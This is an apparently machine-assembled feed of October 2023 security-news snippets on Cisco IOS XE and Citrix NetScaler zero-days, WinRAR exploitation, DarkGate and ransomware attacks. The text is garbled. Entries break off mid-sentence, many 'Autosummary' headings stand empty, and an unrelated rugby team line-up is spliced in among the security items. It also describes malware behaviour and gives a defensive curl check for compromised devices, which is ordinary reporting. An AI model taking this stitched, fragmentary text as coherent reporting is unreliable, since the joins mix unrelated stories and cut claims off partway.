This stark contrast highlights the importance of implementing a multilayered identity verification system incorporatingliveness testing, biometric verification, and consortium validation, and demonstrates that professional fraudsters are still using traditional modes such as personal data and document numbers to generate synthetic identities used in coordinated attacks. "Admiral James A. Winnefeld, USN (Ret.), is the former vice chairman of the Joint Chiefs of Staff and is an advisor to Acalvio Technologies. In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. Admiral Winnefeld, given your vast experience in military strategy and operations, … More
The post The evolution of deception tactics from traditional to cyber warfare appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries.This subtlety, combined with the constant evolution of cyber operations and capability, blurs the boundaries between random attacks, espionage, sabotage, and acts of warfare. Although not all countries or groups or individuals will adhere to international laws, having a clear understanding of the legal dimensions of cyber warfare will help clarify unacceptable parameters of attacks, including, for example, the loss of critical infrastructure systems that could harm large numbers of civilians. "Cheat sheets are concise, to-the-point references tailored for instant insights. This article provides a curated list of 10 essential cybersecurity cheat sheets, all free to download. Whether you’re seeking a quick refresher or a beginner trying to make sense of it all, these resources will help. The ABCs of cybersecurity terms Whether you are looking to start a career in cybersecurity or actively wanting to protect your personal information, you will need to know and … More
The post 10 essential cybersecurity cheat sheets available for free appeared first on Help Net Security.
"Autosummary:
This cheat sheet outlines tips and tools for analyzing malicious documents, such as Microsoft Office, RTF, and PDF files. "Autosummary:
"Autosummary:
"Autosummary:
"Under some rare conditions, an attacker could leak enough information to restore the seed of the pseudorandom number generator (PRNG), reconstruct the admin password, and remotely take over the admin account," Claroty"s Sharon Brizinov said in a Tuesday report. "Taiwanese manufacturer D-Link confirmed a data breach after a threat actor offered for sale on BreachForums stolen data. The global networking equipment and technology company D-Link confirmed a data breach after a threat actor earlier this month offered for sale on the BreachForums platform the stolen data. The company became aware of the a claim of data […]
The post D-Link confirms data breach, but downplayed the impact appeared first on Security Affairs.
"Autosummary:
D-Link confirms data breach, but downplayed the impact Pierluigi Paganini October 18, 2023 October 18, 2023 Taiwanese manufacturer D-Link confirmed a data breach after a threat actor offered for sale on BreachForums stolen data. "Autosummary:
"In recent weeks, Google"s Threat Analysis Group"s (TAG) has observed multiple government-backed hacking groups exploiting the known vulnerability, CVE-2023-38831, in WinRAR, which is a popular file archiver tool for Windows," Google said today. "Autosummary:
Also, upgrading the appliances to the following firmware versions should be prioritized: NetScaler ADC and NetScaler Gateway 14.1-8.50 and later NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1 NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NdcPP This is the second zero-day flaw Citrix fixes in its products this year. "Autosummary:
The script is responsible for most of the malicious activity on a compromised Linux server, including the following: Download and run an XMRig miner disguised as "python-dev" Set up four cron jobs (apache2, apache2.2, netns, netns2) for the miner"s and script"s persistence Insert an attacker-controlled SSH key for persistent root access Install the "Diamorphine" LKM (loadable kernel module) rootkit that helps hide specific processes from monitoring tools Steal credentials from the breached endpoint and spread via SSH Cado reports that mi.sh also performs some attack-optimization steps using an additional component named "kthreadd," such as detecting competing miners in the list of running processes and killing them and using the "netstat" utility to shut connections to IPs flagged for cryptojacking. "Autosummary:
With the information that has been stolen and collated, criminals contact plastic surgeons and their patients via social media, email, text messages, and demand payment with the promise that if a ransom is paid the stolen sensitive data will not be published. "A number of government-backed APTs are exploiting CVE-2023-38831, a file extension spoofing vulnerability in WinRAR, a widely used file archiver utility for Windows. CVE-2023-38831 has been patched in August 2023, along with another high-severity RCE vulnerability (CVE-2023-40477). Exploited as a zero-day by cybercriminals since April 2023, the vulnerability is now also being used by state-sponsored hacking groups. “The widespread exploitation of the WinRAR bug highlights that exploits for known vulnerabilities can be highly effective, despite … More
The post State-sponsored APTs are leveraging WinRAR bug appeared first on Help Net Security.
"Autosummary:
“According to the Cluster25 visibility and considering the sophistication of the infection chain, the attack could be related with low-to-mid confidence to the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit),” they added. "A recently patched Citrix NetScaler ADC/Gateway information disclosure vulnerability (CVE-2023-4966) has been exploited by attackers in the wild since late August 2023, Mandiant researchers have revealed. About CVE-2023-4966 Citrix’s security advisory, published on October 10, says that the vulnerability can lead to sensitive information disclosure, but did not explain what type of information can be disclosed to attackers. CVE-2023-4966 is exploitable remotely without authentication, and a successful attack does not hinge of user interaction. The … More
The post Citrix NetScaler bug exploited in the wild since August (CVE-2023-4966) appeared first on Help Net Security.
"Autosummary:
The vulnerability impacts the following NetScaler ADC and Gateway appliances: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19 NetScaler ADC 13.1-FIPS before 13.1-37.164 NetScaler ADC 12.1-FIPS before 12.1-55.300 NetScaler ADC 12.1-NDcPP before 12.1-55.300 Only appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authorization and accounting (AAA) virtual server are vulnerable. "Autosummary:
"Autosummary:
"Experts reported that the vulnerability CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices has been exploited in attacks since late August. On October 10, Citrix published a security bulletin related to a critical vulnerability, tracked as CVE-2023-4966, in Citrix NetScaler ADC/Gateway devices. “Exploits of CVE-2023-4966 on unmitigated appliances have been observed.” reported Citrix. “Cloud Software Group strongly urges customers of […]
The post Threat actors have been exploiting CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices since August appeared first on Security Affairs.
"Autosummary:
“Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible: NetScaler ADC and NetScaler Gateway 14.1-8.50 and later releases NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1 NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NDcPP Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL). "Autosummary:
Real-time code scans Google"s Play Protect platform is Android"s built-in protection system for performing on-device scans for unwanted software and malware, powered by data derived from 125 billion daily scans. "Autosummary:
The latest version of MATA comes in DLL form and features extensive remote control capabilities, supports multi-protocol (TCP, SSL, PSSL, PDTLS) connections to the control servers, and supports proxy (SOCKS4, SOCKS5, HTTP+web, HTTP+NTLM) server chains. Recorded activity times (GMT) (Kaspersky) Other interesting findings include a new malware module that can leverage removable storage media such as USB to infect air-gapped systems, various stealers capable of capturing credentials, cookies, screenshots, and clipboard contents, and EDR/security bypass tools. "Autosummary:
"In recent weeks, Google"s Threat Analysis Group"s (TAG) has observed multiple government-backed hacking groups exploiting the known vulnerability, CVE-2023-38831, in WinRAR, which is a popular file archiver tool for Windows," Google TAG said today. "Autosummary:
For a while, the cybercriminals were sufficiently active to compromise in a single month at least 15 companies in the manufacturing, finance, construction, agriculture, marketing, and high technology sectors. "Autosummary:
Lazarus has been linked to various espionage, data theft, and financial gain attacks, including targeting security researchers, trojanizing open-source crypto platforms, performing massive cryptocurrency heists, and conducting fake job interviews to distribute malware. "Categories: Exploits and vulnerabilities Categories: News Tags: Cisco Tags: IOS X Tags: remote management Tags: vulnerability Tags: CVE-2023-20198 Tags: webUI Tags: hxxp server Tags: hxxp secure-server Researchers have found that a recently disclosed vulnerability in Cisco IOS XE has already rendered thousands of compromised devices. |
The post Cisco IOS XE vulnerability widely exploited in the wild appeared first on Malwarebytes Labs.
"Autosummary:
To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks. "Cyber entities continue to show a persistent interest in targeting critical infrastructure by taking advantage of vulnerable OT assets. To counter this threat, NSA has released a repository for OT Intrusion Detection Signatures and Analytics to the NSA Cyber GitHub. The capability, known as ELITEWOLF, can enable defenders of critical infrastructure, defense industrial base, and national security systems to identify and detect potentially malicious cyber activity in their OT environments. These signatures/analytics aren’t necessarily malicious … More
The post ELITEWOLF: NSA’s repository of signatures and analytics to secure OT appeared first on Help Net Security.
"Autosummary:
Error. "88% of organizations experienced an average of 40 attacks in the past 12 months, according to a survey conducted by the Proofpoint and Ponemon Institute. Supply chain attacks: Leading patient care risk The average total cost of a cyberattack experienced by healthcare organizations was $4.99 million, a 13% increase from the previous year. Among the organizations that suffered the four most common types of attacks—cloud compromise, ransomware, supply chain, and BEC — an average of … More
The post Cyberattacks on healthcare organizations affect patient care appeared first on Help Net Security.
"Autosummary:
Error. "Autosummary:
"Autosummary:
The backdoor, saved under the file path "/usr/binos/conf/nginx-conf/cisco_service.conf," is not persistent, meaning it will not survive a device reboot. "Threat actors are targeting Israeli Android users with a malicious version of the ‘RedAlert – Rocket Alerts’ that hide spyware. A threat actor is targeting Israeli Android users with a spyware-laced version of the ‘RedAlert – Rocket Alerts’ app, Cloudflare warns. RedAlert – Rocket Alerts is a mobile app that provides real-time alerts about incoming […]
The post Malware-laced ‘RedAlert – Rocket Alerts’ app targets Israeli users appeared first on Security Affairs.
"Autosummary:
For users who have installed RedAlert on their devices, they can determine whether they have been compromised by checking for extraneous permissions, such as: Call Logs Contacts Phone SMS Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Android) "ClearFake, a recently documented threat leveraging compromised WordPress sites to push malicious fake browser updates, is likely operated by the threat group behind the SocGholish “malware delivery via fake browser updates” campaigns, Sekoia researchers have concluded. About ClearFake ClearFake is the name given by researcher Randy McEoin to a malware delivery campaign he outlined in August 2023. “The name is a reference to the majority of the Javascript being used without obfuscation,” he explained. The … More
The post Researchers warn of increased malware delivery via fake browser updates appeared first on Help Net Security.
"Autosummary:
ClearFake fake update page for Chrome (Source: Sekoia) According to Proofpoint researchers, the fake update pages are served in different languages (English, French, German, Spanish, and Portuguese), depending on the users’ browser’s set language. "What is the impact of ransomware on organizations? One employee’s mistake can cost a company millions of dollars. Studies show that human error is the root cause of more than 80% of all cyber breaches, whether malicious or unintended. The recent debilitating cyberattacks on casino and resort giants MGM and Caesars are no exception. How […]
The post Ransomware realities in 2023: one employee mistake can cost a company millions appeared first on Security Affairs.
"Autosummary:
Ransomware realities in 2023: one employee mistake can cost a company millions Pierluigi Paganini October 17, 2023 October 17, 2023 What is the impact of ransomware on organizations?With 85% of campaigns targeting victims with phishing emails containing malicious links, another form of a social engineering attack, education and cyber vigiliance remain a high priority. MGM has revealed that the September 11th attack – which forced an entire system shutdown, impacting all guest services and emptying casino floors for nearly a week – will cost the company upwards of $100 million in 3rd quarter profits. "Autosummary:
Most people — 51% admit to reusing the same login credentials across multiple sites, so if bad actors can successfully access one set of credentials, they can likely access multiple bank accounts, credit cards, emails, and more. So, for example, if your end-user decides to use their ultra-secure 20-character Hulu password as their password to log into corporate email account, your security is at risk. Motives for Credential Theft The dark web is filled with cybercriminals interested in selling stolen data to the highest bidder — things like social security numbers, sensitive corporate data, passwords, or credit card information. "BackBox launched Network Vulnerability Manager (NVM). With this new capability added to its existing Network Automation Platform, BackBox integrates automated OS upgrades and network configuration management capabilities with network vulnerability management into common workflows. NVM is purpose-built for network teams to easily discover vulnerabilities in their network, prioritize CVEs according to their unique risk profile, and automate multiple levels of remediation, no matter the network complexity. According to a Ponemon Institute study on the Costs … More
The post BackBox Network Vulnerability Manager identifies vulnerabilities and classifies them by threat level appeared first on Help Net Security.
"Autosummary:
With the addition of NVM, the platform now offers network teams a comprehensive vulnerability management process that: Identifies vulnerabilities and classifies them by threat level as they surface Prioritizes them according to the needs of each customer’s unique network environment Automates multiple levels of remediation through configuration changes, network and firewall OS upgrades, and patches Simplifies OS and firmware updates with built-in backups, single-click roll-backs, and integrated pre- and post-update validations Helps network teams with device lifecycle management and automates hardware upgrades around vendor-driven EOL (End of Life) data “Manual processes have become obsolete. "Autosummary:
" Highlights of the Webinar: Beware the Sirens: Learn to identify and avoid common tactics targeting your finances. "Russia-linked APT group Sandworm has hacked eleven telecommunication service providers in Ukraine between since May 2023. The Russia-linked APT group Sandworm (UAC-0165) has compromised eleven telecommunication service providers in Ukraine between May and September 2023, reported the Ukraine’s Computer Emergency Response Team (CERT-UA). According to public sources, the threat actors targeted ICS of at least […]
The post Russia-linked Sandworm APT compromised 11 Ukrainian telecommunications providers appeared first on Security Affairs.
"Autosummary:
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. "Autosummary:
"Autosummary:
"Autosummary:
D-Link stolen data up for sale (BleepingComputer) Data stolen from a "test lab" system D-Link said the security breach occurred due to an employee falling victim to a phishing attack, granting the attacker access to the company"s network. "Autosummary:
"Autosummary:
" Trellix"s analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that utilize Discord"s CDN to download a next-stage payload, including stealers like RedLine, Vidar, Agent Tesla, and Umbral. "Threat actors exploited the recently disclosed zero-day flaw (CVE-2023-20198) in a large-scale hacking campaign on Cisco IOS XE devices. Threat actors have exploited the recently disclosed critical zero-day vulnerability (CVE-2023-20198) to compromise thousands of Cisco IOS XE devices, security firm VulnCheck warns. Cisco this week warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), […]
The post CVE-2023-20198 zero-day widely exploited to install implants on Cisco IOS XE systems appeared first on Security Affairs.
"Autosummary:
CVE-2023-20198 zero-day widely exploited to install implants on Cisco IOS XE systems Pierluigi Paganini October 17, 2023 October 17, 2023 Threat actors exploited the recently disclosed zero-day flaw (CVE-2023-20198) in a large-scale hacking campaign on Cisco IOS XE devices.This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.” "Autosummary:
Kwik Trip is a US chain of over 800 convenience stores and gas stations in Michigan, Minnesota, and Wisconsin, also operating under the name Kwik Star in Illinois, Iowa, and South Dakota. "Autosummary:
This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks," said VulnCheck CTO Jacob Baines. "Categories: News Categories: Ransomware The US is pushing member countries of the Counter Ransomware Initiative to stop paying ransoms to cybercriminals. |
The post The US wants governments to commit to not paying ransoms appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. “The work of the CRI supports the implementation of the endorsed UN framework for responsible state behavior in cyberspace, specifically the voluntary norm that States should cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats.” White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been a topic of discussion among members of the CRI, and she noted that several other countries have also raised the issue, but no decisions have been made. "Autosummary:
"97% of organizations are struggling to secure their IoT and connected products to some degree, according to Keyfactor. The research survey also found that 98% of organizations experienced certificate outages in the last 12 months, costing an average of over $2.25 million. “Organizations worldwide are under mounting pressure to ensure their IoT and connected devices are protected while navigating an increasingly complex digital landscape that requires complete trust,” said Ellen Boehm, SVP, IoT Strategies and … More
The post Inadequate IoT protection can be a costly mistake appeared first on Help Net Security.
"Autosummary:
88% of organizations agree that improvements are needed in the security of IoT and connected products in use within their organization, with 37% of respondents reporting that significant improvement is needed and 60% reporting that some improvement is needed. "Autosummary:
"Autosummary:
"Spyware operators can also use this interface to initiate attack attempts against a target phone, and if successful, to retrieve and access sensitive information including photos, location data, chat messages, and microphone recordings from the infected device. "Microsoft thwarted a large-scale hacking campaign carried out by Akira ransomware operators targeting an unknown industrial organization. Microsoft announced that its Microsoft Defender for Endpoint helped to block a large-scale hacking campaign carried out by Akira ransomware operators (tracked by Microsoft as Storm-1567) The attack took place in early June 2023 and aimed at an industrial engineering […]
The post Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm appeared first on Security Affairs.
"Autosummary:
“This is why, as announced today, we added user containment to the automatic attack disruption capability in Microsoft Defender for Endpoint, a unique and innovative defense mechanism that stops human-operated attacks in their tracks” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) "Researchers uncovered an ongoing campaign abusing popular messaging platforms Skype and Teams to distribute the DarkGate malware. From July to September, researchers from Trend Micro observed a malicious campaign DarkGate campaign abusing instant messaging platforms to deliver a VBA loader script to victims. The threat actors abused popular messaging platforms such as Skype and Teams […]
The post DarkGate malware campaign abuses Skype and Teams appeared first on Security Affairs.
"Autosummary:
Self-update and self-manage Implement remote access software (such as remote desktop protocol or RDP, hidden virtual network computing or hVNC, and AnyDesk) Enable cryptocurrency mining functionality (start, stop, and configure) "Autosummary:
Even if there isn"t a zero-day vulnerability in Signal as the online rumours described, it still makes sense to practice safe computing, ensure that your privacy settings are configured as you expect them to be, and that you are ensuring that your apps are properly updated. "A threat actor is using compromised Skype accounts to deliver the DarkGate malware to target organizations, Trend Micro researchers have warned. “Versions of DarkGate have been advertised on Russian language forum eCrime since May 2023. Since then, an increase in the number of initial entry attacks using the malware has been observed,” they noted. DarkGate malware comes via Skype and Teams The threat actor leverages compromised Skype accounts to contact employees at target organization by … More
The post Compromised Skype accounts deliver DarkGate malware to employees appeared first on Help Net Security.
"Autosummary:
First documented in late 2017, DarkGate is loader malware that can execut discovery commands, implement (legitimate) remote access software, log keystrokes, steal information stored by browsers, annd “DarkGate also uses a Windows-specific automation and scripting tool called AutoIt to deliver and execute its malicious capabilities. "Microsoft is offering up to $15,000 to bug hunters that pinpoint vulnerabilities of Critical or Important severity in its AI-powered “Bing experience”. “The new Microsoft AI bounty program comes as a result of key investments and learnings over the last few months, including an AI security research challenge and an update to Microsoft’s vulnerability severity classification for AI systems,” says Lynn Miyashita, a technical program manager with the Microsoft Security Response Center. The Microsoft AI … More
The post Microsoft announces AI bug bounty program appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), [and] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said. "Autosummary:
"Encrypted messaging app Signal denied claims of an alleged zero-day flaw in its platform after a responsible investigation. The popular encrypted messaging app Signal denied claims of an alleged zero-day vulnerability in its platform. The company launched an investigation into the claims after they have seen the vague viral reports alleging a zero-day vulnerability. “PSA: […]
The post Signal denies claims of an alleged zero-day flaw in its platform appeared first on Security Affairs.
"Autosummary:
Signal denies claims of an alleged zero-day flaw in its platform Pierluigi Paganini October 16, 2023 October 16, 2023 Encrypted messaging app Signal denied claims of an alleged zero-day flaw in its platform after a responsible investigation. "Autosummary:
Additionally, the attackers use tools like "ffuf", "dirbuster", "gowitness", and "nmap" to find potential vulnerabilities in web services that can be exploited to gain access. "Autosummary:
One approach to detecting the presence of the malicious implant on compromised Cisco IOS XE devices involves running the following command on the device, where the placeholder "DEVICEIP" represents the IP address under investigation: curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1" "We are working non-stop to provide a software fix and we strongly urge customers to take immediate action as outlined in the security advisory. "Autosummary:
Payloads dropped via the CDN system (Trellix) Regarding the abuse of Discord webhooks for data theft from the victim"s device, Trellix says the following 17 families have applied the practice since August 2021: MercurialGrabber AgentTesla UmbralStealer Stealerium Sorano zgRAT SectopRAT NjRAT Caliber44Stealer InvictaStealer StormKitty TyphonStealer DarkComet VenomRAT GodStealer NanocoreRAT GrowtopiaStealer These malware families will collect credentials, browser cookies, cryptocurrency wallets, and other data from infected systems, and then upload them to a Discord server using webhooks. "Autosummary:
Exploited to create rogue admin accounts Two WordPress security firms, Wordfence and WPScan (Automattic), have marked CVE-2023-5360 as actively exploited since August 30, 2023, with the attack volume ramping up starting on October 3, 2023. "A previously unknown vulnerability (CVE-2023-20198) affecting networking devices running Cisco IOS XE software is being exploited by a threat actor to take control of the devices and install an implant, Cisco Talos researchers have warned today. About CVE-2023-20198 CVE-2023-20198 is a privilege escalation vulnerability in the web UI feature of Cisco IOS XE software, which is installed on various Cisco controllers, switches, edge, branch and virtual routers. The web UI is an embedded GUI-based tool … More
The post Cisco IOS XE zero-day exploited by attackers to deliver implant (CVE-2023-20198) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-20198 CVE-2023-20198 is a privilege escalation vulnerability in the web UI feature of Cisco IOS XE software, which is installed on various Cisco controllers, switches, edge, branch and virtual routers. "Cisco warned customers of a critical zero-day vulnerability in its IOS XE Software that is actively exploited in attacks. Cisco warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. The IT giant found the vulnerability during the resolution of multiple Technical Assistance […]
The post Cisco warns of active exploitation of IOS XE zero-day appeared first on Security Affairs.
"Autosummary:
⚠ CVSS: 10 ❌ Fixes : not available Related to the attack: 5.149.249[.]74 154.53.56[.]231 Cisco provided some way to check if the system might be compromised 1/2 — CERT Orange Cyberdefense (@CERTCyberdef) October 16, 2023 Cisco Talos researchers first spotted attacks exploiting the flaw on September 28, 2023. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Turning military veterans into cybersecurity experts In this Help Net Security interview, James Murphy, the Director of the TechVets Programme at the Forces Employment Charity and member of Fortinet’s Veterans Program Advisory Council, discusses the challenges that military veterans face when transitioning from military to civilian life. Unmasking the limitations of yearly penetration tests In this Help Net Security interview, … More
The post Week in review: Patched curl and libcurl vulnerability, 15 free M365 security training modules appeared first on Help Net Security.
"Autosummary:
Microsoft fixes exploited WordPad, Skype for Business zero-days (CVE-2023-36563, CVE-2023-41763) On this October 2023 Patch Tuesday, Microsoft has released 103 patches and has fixed three actively exploited vulnerabilities (CVE-2023-36563, CVE-2023-41763, CVE-2023-44487). "Autosummary:
It supports DRM (digital rights management), multiplayer, video streaming, matchmaking, achievements system, in-game voice and chat, microtransactions, statistics, cloud saving, and community-made content sharing (Steam Workshop). "Autosummary:
XOR-encrypted payload Source: Trend Micro RomCom 4.0 Trend Micro identifies the latest, stripped-down variant of RomCom as the fourth major release of the backdoor, explaining that it"s the same malware Volexity researchers recently named "Peapod." Targeting women political leaders In August 2023, Void Rabisu set up a malicious website on the address "wplsummit[.]com", designed to imitate the real Women Political Leaders (WPL) website hosted on wplsummit.org. Fake WPL Summit website Source: "The Alphv ransomware group added the Morrison Community Hospital to its dark web leak site. Threat actors continue to target hospitals. The ALPHV/BlackCat ransomware group claims to have hacked the Morrison Community Hospital and added it to its dark web Tor leak site. The group claims to have stolen 5TB of patients’ and employee’s information, […]
The post The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital appeared first on Security Affairs.
"Autosummary:
The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital Pierluigi Paganini October 15, 2023 October 15, 2023 The Alphv ransomware group added the Morrison Community Hospital to its dark web leak site. "Autosummary:
Furthermore, dependencies, code, and open source components may undergo a separate validation process, aimed at thwarting malware, than the one suited for translations, making incidents like these harder to discover. "I trust Ubuntu because it"s the most widely used so it should have the best review team, but if this happened with translations and no one saw, imagine with dependencies with malware injected," posted a user on X (formerly Twitter). "CISA warns organizations of vulnerabilities and misconfigurations that are known to be exploited in ransomware operations. The US cybersecurity agency CISA is sharing knowledge about vulnerabilities and misconfigurations exploited in ransomware attacks. The initiative is part of its Ransomware Vulnerability Warning Pilot (RVWP) program which launched this year. The US Agency is sharing this information […]
The post CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks appeared first on Security Affairs.
"Autosummary:
CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks Pierluigi Paganini October 14, 2023 October 14, 2023 CISA warns organizations of vulnerabilities and misconfigurations that are known to be exploited in ransomware operations. "The Lockbit ransomware gang claims to have hacked the technology services giant CDW and threatens to leak the stolen data. The technology services giant CDW announced it has launched an investigation into claims made by the Lockbit ransomware gang that added the company to the list of victims on its leak site. CDW Corporation is […]
The post Lockbit ransomware gang demanded an 80 million ransom to CDW appeared first on Security Affairs.
"Autosummary:
A secondary division of the company, known as CDW-G, focuses on United States governmental entities, including as K-12 schools, universities, non-profit healthcare organizations, State & Local and the Federal government. "Autosummary:
"Autosummary:
Line-ups Wales: L Williams; Rees-Zammit, North, Tompkins, Adams; Biggar, G Davies; G Thomas, Elias, Francis, Rowlands, Beard, Morgan (capt), Reffell, Wainwright. Argentina: Mallia; Boffelli, Cinti, Chocobares, M Carreras; S Carreras, Cubelli; Gallo, Montoya (capt), Gomez Kodela, Petti, Lavanini, Gonzalez, Kremer, Isa. Replacements: Lake, Domachowski, D Lewis, D Jenkins, Tshiunza, T Williams, Costelow, Dyer. Replacements: Creevy, Sclavi, Bello, Alemanno, Bruni, Bazan Velez, Sanchez, Moroni. "Autosummary:
The malware was touted to offer a wide range of features, including a concealed VNC, capabilities to bypass Windows Defender, a browser history theft tool, an integrated reverse proxy, a file manager, and a Discord token stealer. "60% of companies are ‘very’ to ‘extremely’ concerned about ransomware attacks, according to latest research from Hornetsecurity. Businesses acknowledge ransomware risk Hornetsecurity revealed that 92.5% businesses are aware of ransomware’s potential for negative impact. Still, just 54% of respondents said their leadership is ‘actively involved in conversations and decision-making’ around preventing such attacks. 39.7% said they were happy to ‘leave it to IT to deal with the issue’. “Our survey is a timely reminder that … More
The post Stronger ransomware protection finally pays off appeared first on Help Net Security.
"Autosummary:
Effective security tools for ransomware defense The survey revealed the most used tools to combat potential threats: 87.8% used to end-point detection software with anti-ransomware capabilities 84.4% cited ’email filtration and threat analysis’ 22.4% mentioned ‘AI-enabled security solutions’ as a tool they are now using to combat ransomware within their organization. "Autosummary:
In my opinion, Valve would have done better to have adopted a form of two-factor authentication which wasn"t reliant on SMS messages, such as app-based TOTP (Time-based One-Time Passwords) authenticators, hardware security keys, or passkeys instead. "DigiCert announced its next generation Discovery, a set of key capabilities in DigiCert Trust Lifecycle Manager that enable customers to build a centralized book of record of their cryptographic keys and certificates. This centralized view, when coupled with management and automated provisioning and renewal, improves cryptoagility, reducing the time and resources needed to update algorithms, rotate keys and certificates and remediate threats. “The majority of organizations have not yet implemented a centralized crypto-management solution,” said … More
The post DigiCert helps companies improve vulnerability management and cryptoagility strategies appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Q3-2023 witnessed a surge in attacks from newer groups such as Cactus, INC Ransom, Metaencryptor, ThreeAM, Knight Ransomware, Cyclop Group, and MedusaLocker, indicating that these groups, while not having the same profile and global presence as major players like LOCKBIT, remain potent threats. The recent patterns we have observed, however, showcase the growing popularity of Rust and GoLang amongst high-profile ransomware groups such as Hive, Agenda, Luna, and RansomExx.Increased adoption/use of Threat Intelligence Platforms Due to their specific competency in this space, as well as their advanced AI and machine learning capabilities, organizations are increasingly using Threat Intelligence Platforms for their expertise, anomaly detection, and behavioral analysis to gain real-time threat intelligence to help mitigate ransomware attacks. Vision has the ability to scan your entire attack surface, extending to your vendors, partners, and third parties as well, giving you the ability to secure your entire supply chain and ecosystem from attacks. The Healthcare sector is particularly vulnerable to ransomware attacks as it has an extremely large attack surface spanning several websites, portals, billions of IoT medical devices, and a large network of supply chain partners and vendors. "Autosummary:
"Cybercriminals can use these payloads to infect systems with various types of malware, including info stealers, ransomware, malicious and/or abused remote management tools, and cryptocurrency miners," the researchers said. "Autosummary:
This includes adopting application controls, limiting the use of RDP and other remote desktop services, restricting PowerShell use, requiring phishing-resistant multi-factor authentication, segmenting networks, keeping all systems up-to-date, and maintaining periodic offline backups. "Instead of deploying malicious files on the victim device, encryption is done remotely, with the system process performing the encryption, which renders process-based remediation ineffective," Microsoft explained. "FBI and CISA published a joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with AvosLocker ransomware. The joint Cybersecurity Advisory (CSA) published by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) provides known IOCs, TTPs, and detection methods associated with the AvosLocker ransomware variant employed […]
The post FBI and CISA published a new advisory on AvosLocker ransomware appeared first on Security Affairs.
"Autosummary:
CISA and the FBI recommend to secure remote access tools by: Implementing application controls; Strictly limit the use of RDP and other remote desktop services; Disable command-line and scripting activities and permissions; Restrict the use of PowerShell; Update Windows PowerShell or PowerShell Core; Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations. "Autosummary:
"Autosummary:
"Void Rabisu is one of the clearest examples where we see a mix of the typical tactics, techniques, and procedures (TTPs) used by cybercriminal threat actors and TTPs used by nation-state-sponsored threat actors motivated primarily by espionage goals," Trend Micro said. "A cyberespionage campaign, tracked as Stayin’ Alive, targeted high-profile government and telecom entities in Asia. Cybersecurity company Check Point uncovered a malicious activity, tracked as Stayin’ Alive, that is targeting high-profile government and telecom entities in Asian countries, including Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The campaign has been active since at least 2021, threat actors employed downloaders […]
